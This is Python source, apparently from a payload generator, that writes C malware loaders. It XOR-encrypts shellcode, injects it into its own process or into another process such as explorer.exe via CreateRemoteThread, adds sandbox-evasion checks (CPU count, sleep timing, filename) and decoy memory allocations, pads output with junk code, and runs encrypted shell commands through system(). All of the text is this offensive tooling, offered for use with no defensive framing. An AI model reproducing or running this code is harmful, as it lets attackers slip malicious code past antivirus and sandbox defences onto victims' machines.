def local_thread_injection(vShellcode, decoder_stub, junkcode, intensity): execs = core.varname_creator() lti = decoder_stub lti += junk.junk_inject(junkcode, "code", intensity) lti += "\nvoid *" + execs + " = VirtualAlloc(0, sizeof " + vShellcode + ", MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n" lti += junk.junk_inject(junkcode, "code", intensity) lti += "memcpy(" + execs + ", " + vShellcode + ", sizeof " + vShellcode + ");\n" lti += junk.junk_inject(junkcode, "code", intensity) lti += "((void(*)())" + execs + ")();\n" lti += "}\n" return lti
def mono_core(junkcode, intensity): evasion_funcname = "void " + core.varname_creator() + "(void)\n" mem2 = core.varname_creator() evasion_func = evasion_funcname evasion_func += "{\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "LPVOID " + mem2 + "= NULL;\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += mem2 + " = VirtualAllocEx(GetCurrentProcess(), NULL, 1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "if (" + mem2 + " != NULL)\n" evasion_func += "{\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += 'printf("' + core.varname_creator() + '");\n' evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += '}\n' evasion_func += "else\n" evasion_func += "{\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "exit(0);\n" evasion_func += "}\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "}\n\n" evasion_funcname = replace_string(evasion_funcname) return evasion_funcname, evasion_func
def xor_encryption(shellcode, junkcode, intensity): final_stub = findall('\\\\x([a-f0-9][a-f0-9])', shellcode) shellcode_len = len(final_stub) keylen = randrange(64, 128) password = ''.join(choice(digits) for i in range(keylen)) vShellcode = core.varname_creator() vShellcodelen = core.varname_creator() vEshellcode = core.varname_creator() vPassword = core.varname_creator() vPasswordlen = core.varname_creator() # Variables final_stub = '\nint enc_shellcode[] = { ' + ', '.join([ str(int(code, 16) ^ ord(password[(i % len(password))])) for i, code in enumerate(final_stub) ]) + ' };\n' final_stub += junk.junk_inject(junkcode, "code", intensity) final_stub = final_stub.replace("enc_shellcode", vEshellcode) final_stub += 'int ' + vShellcodelen + f' = {shellcode_len};\n' final_stub += junk.junk_inject(junkcode, "code", intensity) final_stub += 'char ' + vPassword + f'[] = "{password}";\n' final_stub += junk.junk_inject(junkcode, "code", intensity) final_stub += 'int ' + vPasswordlen + f'= {len(password)};\n' final_stub += junk.junk_inject(junkcode, "code", intensity) # Decoder stub final_stub += "unsigned char " + vShellcode + "[" + vShellcodelen + "];\n" final_stub += junk.junk_inject(junkcode, "code", intensity) final_stub += "for(int i = 0; i < " + vShellcodelen + "; i++) {\n" final_stub += junk.junk_inject(junkcode, "code", intensity) final_stub += vShellcode + "[i] = (char) " + vEshellcode + "[i] ^ " + vPassword + "[i % " + vPasswordlen + "];\n}\n" final_stub += junk.junk_inject(junkcode, "code", intensity) return vShellcode, final_stub
def shuffle_funcname(top_funcname_code, junkcode, intensity): top_funcname_code = top_funcname_code.splitlines() shuffle(top_funcname_code) new_line = "" for line in top_funcname_code: line += "\n" new_line += line if junkcode == "yes": new_line += junk.junk_inject(junkcode, "code", intensity) return new_line
def my_name_is(filename, junkcode, intensity): evasion_funcname = "void " + core.varname_creator() + "(char *args)\n" b = core.varname_creator() filename = filename.replace('output/', '') evasion_func = evasion_funcname evasion_func += "{\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += 'if (strstr(args, "' + filename + '") > 0)\n' evasion_func += "{\n" evasion_func += "int " + b + " = 0;\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "}\n" evasion_func += "else" evasion_func += "{\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "exit(0);\n" evasion_func += "}\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "}\n\n" evasion_funcname = evasion_funcname.replace("(char *args)", "(argv[0])") evasion_funcname = replace_string(evasion_funcname) return evasion_funcname, evasion_func
def number_of_core(junkcode, intensity): evasion_funcname = "void " + core.varname_creator() + "(void)\n" sysguide = core.varname_creator() xcore = core.varname_creator() evasion_func = evasion_funcname evasion_func += "{\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "SYSTEM_INFO " + sysguide + ";\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "GetSystemInfo(&" + sysguide + ");\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "int " + xcore + " = " + sysguide + ".dwNumberOfProcessors;\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "if (" + xcore + " < 2)\n" evasion_func += "{\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "exit(0);\n" evasion_func += "}\n" evasion_func += junk.junk_inject(junkcode, "code", intensity) evasion_func += "}\n\n" evasion_funcname = replace_string(evasion_funcname) return evasion_funcname, evasion_func
def exercise_room(injection_type, processname, vShellcode, decoder_stub, architecture, junkcode, intensity, evasions, decoys, windows_firewall, windows_update, filename): exec_code = "" evasion_code = "" junkfunc_code = "" top_funcname_code = "" evasion_funcname, evasion_func = evasion.the_great_evasion( evasions, architecture, filename, junkcode, intensity) junkfuncname, junkcode_func = junk.junk_inject(junkcode, "func", intensity) decoy_code = decoy.fake_u(decoys, junkcode, intensity) xor_func, exec_stub = postexploit.hidden_forever(windows_firewall, windows_update, junkcode, intensity) final_code = "" if injection_type == "local": if junkcode == "yes": junkfunc_code += junkcode_func top_funcname_code += junkfuncname core.junkcode_added() core.junkfunc_added() if evasions == "yes": evasion_code += evasion_func top_funcname_code += evasion_funcname core.evasion_added() exec_code += local_thread_injection(vShellcode, decoder_stub, junkcode, intensity) final_code += body_builder(evasion_code, junkfunc_code, top_funcname_code, exec_code, decoy_code, xor_func, exec_stub, junkcode, intensity) elif injection_type == "remote": if junkcode == "yes": junkfunc_code += junkcode_func top_funcname_code += junkfuncname core.junkcode_added() core.junkfunc_added() if evasions == "yes": evasion_code += evasion_func top_funcname_code += evasion_funcname core.evasion_added() if processname != "": exec_code += remote_thread_injection(processname, vShellcode, decoder_stub, junkcode, intensity) final_code += body_builder(evasion_code, junkfunc_code, top_funcname_code, exec_code, decoy_code, xor_func, exec_stub, junkcode, intensity) else: processname = "explorer.exe" exec_code += remote_thread_injection(processname, vShellcode, decoder_stub, junkcode, intensity) final_code += body_builder(evasion_code, junkfunc_code, top_funcname_code, exec_code, decoy_code, xor_func, exec_stub, junkcode, intensity) return final_code
def remote_thread_injection(processname, vShellcode, decoder_stub, junkcode, intensity): entry = core.varname_creator() snapshot = core.varname_creator() process_handle = core.varname_creator() remote_thread = core.varname_creator() remote_buffer = core.varname_creator() rti = decoder_stub rti += junk.junk_inject(junkcode, "code", intensity) rti += "\nPROCESSENTRY32 " + entry + ";\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += entry + ".dwSize = sizeof(PROCESSENTRY32);\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += "HANDLE " + snapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += "if (Process32First(" + snapshot + ", &" + entry + ") == TRUE)\n" rti += "{\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += "while (Process32Next(" + snapshot + ", &" + entry + ") == TRUE)\n" rti += "{\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += 'if (stricmp(' + entry + '.szExeFile, ' + '"' + processname + '"' + ') == 0)' rti += '{\n' rti += junk.junk_inject(junkcode, "code", intensity) rti += "HANDLE " + process_handle + ";\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += "HANDLE " + remote_thread + ";\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += "PVOID " + remote_buffer + ";\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += process_handle + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE, " + entry + ".th32ProcessID);\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += remote_buffer + " = VirtualAllocEx(" + process_handle + ", NULL, sizeof " + vShellcode + ", (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += "WriteProcessMemory(" + process_handle + ", " + remote_buffer + ", " + vShellcode + ", sizeof " + vShellcode + ", NULL);\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += remote_thread + " = CreateRemoteThread(" + process_handle + ", NULL, 0, (LPTHREAD_START_ROUTINE)" + remote_buffer + ", NULL, 0, NULL);\n" rti += junk.junk_inject(junkcode, "code", intensity) rti += "CloseHandle(" + process_handle + ");}}}\n" rti += "CloseHandle(" + snapshot + ");" rti += "}\n" return rti
def encrypt_exec(commands, junkcode, intensity): # Decryptor func_name = core.varname_creator() arg_command = core.varname_creator() arg_key = core.varname_creator() arg_command_lenght = core.varname_creator() arg_key_lenght = core.varname_creator() arg_exec = core.varname_creator() i = core.varname_creator() func_stub = "void " + func_name + "(int " + arg_command + "[], int " + arg_key + "[], int " + arg_command_lenght + ", int " + arg_key_lenght + ", char " + arg_exec + "[])\n" func_stub += "{\n" func_stub += junk.junk_inject(junkcode, "code", intensity) func_stub += "for(int " + i + " = 0; " + i + "< " + arg_command_lenght + "; " + i + "++)" func_stub += "{\n" func_stub += junk.junk_inject(junkcode, "code", intensity) func_stub += arg_exec + "[" + i + "] = " + arg_command + "[" + i + "] ^ " + arg_key + "[" + i + " % " + arg_key_lenght + "];\n" func_stub += junk.junk_inject(junkcode, "code", intensity) func_stub += "}\n" func_stub += junk.junk_inject(junkcode, "code", intensity) func_stub += arg_exec + "[" + arg_command_lenght + "] = 0;\n" func_stub += junk.junk_inject(junkcode, "code", intensity) func_stub += "}\n" keylen = randrange(1024, 4096) key = ''.join(choice(digits) for i in range(keylen)) cmd = list() for command in commands: cmd.append(xor_encrypt(command, key)) vKeylen = core.varname_creator() vKey = core.varname_creator() vNumcommands = core.varname_creator() vSizeofcommands = core.varname_creator() vMaxcommandsize = core.varname_creator() vCommands = core.varname_creator() vExeccommands = core.varname_creator() i = core.varname_creator() code = "int " + vKeylen + f" = {len(key)};\n" code += junk.junk_inject(junkcode, "code", intensity) code += "int " + vKey + f"[] = {{{str([ord(k) for k in key])[1:-1]}}};\n" code += junk.junk_inject(junkcode, "code", intensity) code += "int " + vNumcommands + f" = {len(commands)};\n" code += junk.junk_inject(junkcode, "code", intensity) code += "int " + vSizeofcommands + f"[] = {{{', '.join([str(len(data)) for data in cmd])}}};\n" code += junk.junk_inject(junkcode, "code", intensity) max_length = max([len(data) for data in cmd]) code += "int " + vMaxcommandsize + f" = {max_length};\n" code += junk.junk_inject(junkcode, "code", intensity) code += "int " + vCommands + f"[][{max_length}] = {{{', '.join(['{' + str(cmds)[1:-1] + '}' for cmds in cmd])}}};\n" code += junk.junk_inject(junkcode, "code", intensity) code += "char " + vExeccommands + "[" + vNumcommands + "][" + vMaxcommandsize + " + 1];\n" code += junk.junk_inject(junkcode, "code", intensity) code += "for(int " + i + " = 0; " + i + " < " + vNumcommands + "; " + i + "++)\n" code += "{\n" code += junk.junk_inject(junkcode, "code", intensity) code += func_name + "(" + vCommands + "[" + i + "], " + vKey + ", " + vSizeofcommands + "[" + i + "], " + vKeylen + ", " + vExeccommands + "[" + i + "]);\n" code += junk.junk_inject(junkcode, "code", intensity) code += "system(" + vExeccommands + "[" + i + "]);" code += junk.junk_inject(junkcode, "code", intensity) code += "}\n" return func_stub, code
def fake_u(value, junkcode, intensity): number_of_decoy = value if number_of_decoy != "": transform_to_int = int(number_of_decoy) number_of_decoy = 0 decoy_code = "" while number_of_decoy != transform_to_int: number_of_decoy += 1 memdmp1 = core.varname_creator() tac1 = core.varname_creator() tick1 = core.varname_creator() memdmp1_value = str(random.randint(30000000, 330000000)) decoy_code += "char * " + memdmp1 + "= NULL;\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += memdmp1 + " = (char *)malloc(" + memdmp1_value + ");\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "if (" + memdmp1 + " != NULL)\n" decoy_code += "{\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "memset(" + memdmp1 + ", 00, " + memdmp1_value + ");\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "}\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "int " + tick1 + " = GetTickCount();\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "Sleep(1000);\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "int " + tac1 + " = GetTickCount();\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "if ((" + tac1 + " - " + tick1 + ") < 1000)\n" decoy_code += "{\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "exit(0);\n" decoy_code += "}\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) decoy_code += "free(" + memdmp1 + ");\n" decoy_code += junk.junk_inject(junkcode, "code", intensity) core.decoy_added() return decoy_code elif number_of_decoy == "": return ""